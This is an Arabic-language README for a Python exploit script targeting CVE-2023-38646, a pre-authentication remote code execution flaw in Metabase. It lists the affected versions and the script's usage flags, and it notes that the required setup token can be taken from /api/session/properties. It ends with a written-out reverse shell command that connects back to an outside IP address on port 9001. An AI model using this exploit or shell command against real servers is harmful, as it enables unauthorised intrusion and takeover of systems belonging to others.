
نص استغلال لثغرة RCE قبل المصادقة في Metabase (CVE-2023-38646)
هذا نص Python يستغل ثغرة تنفيذ التعليمات البرمجية عن بعد في برنامج تسجيل الدخول لـ Metabase. يسمح لنا بتنفيذ أوامر عشوائية على الخادم قبل المصادقة.
الإصدارات المعرضة للخطر هي Metabase مفتوح المصدر قبل 0.46.6.1 و Metabase Enterprise قبل 1.46.6.1
python3 exploit.py -u URL -t TOKEN -c COMMAND
-h, --help يعرض رسالة المساعدة هذه ويخرج
-u URL, --url URL عنوان الهدف
-t TOKEN, --token TOKEN
رمز الإعداد الموجود في /api/session/properties
-c COMMAND, --command COMMAND
الأمر المطلوب تنفيذه في الخادم الهدف

الأمر المستخدم: bash -i >& /dev/tcp/10.10.14.26/9001 0>&1